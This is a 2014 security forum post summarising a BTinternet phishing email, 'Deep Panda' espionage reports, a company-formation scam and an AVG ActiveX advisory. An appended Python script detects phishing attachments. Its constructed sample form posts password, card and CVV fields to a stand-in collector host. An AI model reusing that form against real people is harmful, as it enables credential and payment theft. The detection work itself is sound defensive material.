Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  #34 AplusWebMaster (Adviser Team)

    Fake BTinternet email - Phish

    FYI...

    Fake BTinternet email - Phish ...
    - http://www.hoax-slayer.com/expiratio...phishing.shtml
    Last updated: July 8, 2014 - "Message purporting to be from BTInternet claims that you must update all of your 'informations' via an attached form or risk the 'expiration' of your BTInternet email. The message is -not- from BT. It is a phishing scam designed to steal personal and financial information from BT customers.
    Screenshot: http://www.hoax-slayer.com/images/ex...ishing-pin.jpg
    According to this email, which claims to be from BTInternet, you are required to update all of your account information by filling in a form contained in an attached file. The message warns that your account will be disabled if you do not update your details as instructed... the email is -not- from BT and the claim that you must update details or risk account 'expiration' is a lie.
    In fact, the email is a typical phishing scam and is designed to steal your personal and financial data. The attached file contains a form that asks for a large amount of information, including your account login details, your name and contact data, and your credit card and bank account numbers. Opening the attachment loads the form in your web browser. Clicking the 'Submit' button on the -bogus- form sends all of the information to criminals who can then use it to commit financial fraud and identity theft... Any email that asks you to open an attached file or click a link to supply personal and financial information should be treated as suspicious..."

    - https://en.wikipedia.org/wiki/BT_Group
    ___

    Chinese hacks turned focus to U.S. experts on Iraq
    - http://www.reuters.com/article/2014/...0FC2E620140708
    Jul 8, 2014 - "A sophisticated group of hackers believed to be associated with the Chinese government, who for years targeted U.S. experts on Asian geopolitical matters, suddenly began breaching computers belonging to experts on Iraq as the rebellion there escalated, a security firm said on Monday. CrowdStrike Inc said* that the group is one of the most sophisticated of the 30 it tracks in China and that its operations are better hidden than many attributed to military and other government units... China's Foreign Ministry repeated that the government opposed hacking and dismissed the report... Over the past three years, CrowdStrike said it has seen the group it calls "Deep Panda" target defense, financial and other industries in the United States. It has also gone after workers at think tanks who specialize in Southeast Asian affairs, including former government experts..."
    * http://www.crowdstrike.com/blog/deep...nks/index.html
    Jul 7, 2014

    - http://atlas.arbor.net/briefs/index#-308984771
    July 10, 2014
    A Chinese nation-state threat group called "Deep Panda" has been targeting national security think tanks, particularly individuals with ties to Iraq/Middle East policy issues.
    Analysis: The focus on these individuals began the same day as an ISIS-led attack on an oil refinery in Iraq, which provides a large amount of oil to China. [ http://www.crowdstrike.com/blog/deep...nks/index.html ] Advanced threat actors frequently target individuals who may have access to sensitive information, demonstrated recently again when hackers believed to be Chinese accessed some databases of the Office of Personnel Maintenance, which conducts background reviews for security clearances. [ http://www.nytimes.com/2014/07/10/wo...s-workers.html ] Many individuals are also targeted using information available via public sources such as social media. This information could then be used to conduct social engineering attacks to deliver malware, steal credentials, etc.
    ___

    SCAM: "All Company Formation" (allcompanyformation .com / businessformation247 .com)
    - http://blog.dynamoo.com/2014/07/scam...formation.html
    8 July 2014 - "Sometimes it isn't easy to see what a -scam- is, but this email hit my -spamtrap- advertising an outfit that can allegedly create offshore companies and acquire all sorts of trading licences and things like SSL certificates.
    From: All Company Formation [info@ allcompanyformation .com]
    Date: 7 July 2014 12:58
    Subject: [Info] Worldwide Company Formation Services - EV SSL Approval Services
    We have a team of agents in different countries we are providing Company Registration services...
    For order and need more informations kindly contact us : www .allcompanyformation .com
    Email: info@ allcompanyformation .com
    skype : companiesformations

    The spam originates from 209.208.109.225 which belongs to Internet Connect Company in Orlando, Florida. Orlando being a hotbed of fraud which would make it ideal for twinning with Lagos. The spam then bounces through a WebSiteWelcome IP of 192.185.82.77. None of those IPs give a clue as to the real ownership of the site. The -spamvertised- site of allcompanyformation .com (also mirrored at businessformation247 .com) looks generic but professional:
    > https://3.bp.blogspot.com/-gHGjWYiHx...foundation.png
    It is plastered with logos from legitimate organisations, presumably to give it an air of respectability:
    > https://2.bp.blogspot.com/-l9ILGO4rF...formation3.png
    You can pay for these "services" using any one of a number of obscure payment methods:
    > https://2.bp.blogspot.com/-Gy9kjBDZe...formation4.png
    ... The contact information seems deliberately vague and there are no physical contact addresses or company registration details anywhere on the website:
    > https://3.bp.blogspot.com/-N7_7ubPgu...formation5.png
    The telephone number looks like a US one, but on closer examination appears to be a Bandwidth.com VOIP forwarder to another number (which could be anywhere in the world). These 315-944 numbers seem to be often abused by scammers. The WHOIS details are anonymous, and the website has been carefully excised of any identifying information. Most of the text (and indeed the whole concept) has been copy-and-pasted from Slogold.net who seem to be a real company with real contact details. They even go so far as to warn people of various scams using the Slogold name. The following factors indicate that this is a scam, and sending them money would be a hugely bad idea:
    - The site is promoted through spam (this sample was sent to a spamtrap)
    - The domain allcompanyformation .com has anonymous registration details and was created only in December 2013.
    - There are no real contact details anywhere on the site.
    - The text is copy and pasted (i.e. stolen) from other sites, primarily Slogold .net.
    -Avoid- "
    ___

    AVG Safeguard and Secure Search ActiveX control provides insecure methods
    - http://www.kb.cert.org/vuls/id/960193
    Last revised: 07 Jul 2014 - "... By convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to download and execute arbitrary code with the privileges of the logged-on user.
    Solution: Apply an update: This issue is addressed in AVG Secure Search -toolbar- version 18.1.7.598 and AVG Safeguard 18.1.7.644. While these versions are still marked as Safe for Scripting, this version of the control has restrictions in place that prevent its use by web pages hosted by domains other than .avg .com or .avg.nation .com. Please also consider the following workaround:
    Disable the AVG ScriptHelper ActiveX control in Internet Explorer:
    The vulnerable AVG ScriptHelper ActiveX control can be -disabled- in Internet Explorer by setting the kill bit..."
    (More detail at the cert URL above.)
    - https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-2956 - 9.3 (HIGH)

    > http://www.avg.com/us-en/secure-search
    "... connection times out
    > http://inst.avg.com/serve/dl.php?pid...b0:productpage
    "... connection times out

    Last edited by AplusWebMaster; 2014-07-11 at 12:51.
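The attached HTML "update form" described in the BTinternet item above works by posting whatever the victim types straight to a remote collector. The following is an added detection example, not code from the original post: it parses an HTML attachment and flags any form that sends credential or payment fields to a remote URL or a mailto: address. The SENSITIVE prefixes, the hostname and the sample attachment are constructed assumptions.

```python
# Added example (not from the original post): flag an HTML attachment whose <form>
# posts credential/payment fields to a remote URL or mailbox. Sample input is constructed.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Token prefixes marking credential/payment fields (checked on name/id/placeholder/type).
SENSITIVE = ("pass", "pin", "card", "cvv", "expir", "account", "sort", "ssn")


class FormScanner(HTMLParser):
    """Collect every <form>, its action URL and the labels of the fields inside it."""
    def __init__(self):
        super().__init__()
        self.forms = []        # each entry: {"action": str, "fields": [str]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": (a.get("action") or "").strip(), "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            parts = (a.get("name"), a.get("id"), a.get("placeholder"), a.get("type"))
            self._current["fields"].append(" ".join(p for p in parts if p).lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def scan_attachment(html):
    """Return one finding (action URL + matched field kinds) per risky form."""
    parser = FormScanner()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        action = urlparse(form["action"])
        tokens = {t for f in form["fields"] for t in re.split(r"[^a-z0-9]+", f) if t}
        hits = sorted(k for k in SENSITIVE if any(t.startswith(k) for t in tokens))
        # A file opened from disk has no origin: submitting to a remote host or a mailbox
        # hands everything the form collected to whoever controls that target.
        exfil = (action.scheme in ("http", "https") and bool(action.netloc)) or action.scheme == "mailto"
        if hits and exfil:
            findings.append({"action": form["action"], "fields": hits})
    return findings


# Constructed sample modelled on the described attachment (not a real phish).
SAMPLE = """<html><body><h1>BT Internet Account Update</h1>
<form method="post" action="http://collector.example.invalid/submit.php">
Email: <input name="email"> Password: <input type="password" name="passwd">
Card number: <input name="cardno"> CVV: <input name="cvv"> <input type="submit" value="Submit">
</form></body></html>"""
```

Forms with a relative action (or none at all) are left alone, since an attachment opened locally cannot submit them anywhere; a real mail gateway would also want to unpack nested or encoded attachments before scanning.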
